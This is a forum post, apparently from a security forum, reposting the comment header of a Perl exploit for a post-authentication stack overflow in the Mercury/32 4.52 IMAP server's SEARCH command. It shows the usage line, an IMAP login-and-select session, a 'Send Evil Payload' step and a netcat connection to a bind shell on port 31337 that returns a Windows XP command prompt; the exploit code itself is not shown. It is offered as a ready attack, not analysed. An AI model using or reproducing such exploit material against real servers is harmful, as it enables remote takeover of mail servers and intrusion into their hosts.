Jump to content
nullbyte

Mercury/32 4.52 Imapd Search Command Post-auth Overflow

Recommended Posts

# Z:\Exp>mercury_SEARCH.pl 127.0.0.1 143 void ph4nt0m.org

# Mercury/32 v4.52 IMAPD SEARCH command Post-Auth Stack Overflow Exploit

# Found & Code by void# ph4nt0m.org

#

# S: * OK mercury.ph4nt0m.org IMAP4rev1 Mercury/32 v4.52 server ready.

# C: pst06 LOGIN void ph4nt0m.org

# S: pst06 OK LOGIN completed.

# C: pst06 SELECT INBOX

# S: * 0 EXISTS

# S: * 0 RECENT

# S: * FLAGS (\Deleted \Draft \Seen \Answered)

# S: * OK [uIDVALIDITY 1190225819] UID Validity

# S: * OK [uIDNEXT 1] Predicted next UID

# S: * OK [PERMANENTFLAGS (\Deleted \Draft \Seen \Answered)] Settable message flag

# s

# S: pst06 OK [READ-WRITE] SELECT completed.

# [*] Send Evil Payload ...

# [+] Done! Check out cmdshell@127.0.0.1:31337. Good Luck :-P

#

# Z:\Exp>nc -vv 127.0.0.1 31337

# DNS fwd/rev mismatch: localhost != GNU

# localhost [127.0.0.1] 31337 (?) open

# Microsoft Windows XP [°? 5.1.2600]

# © °

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...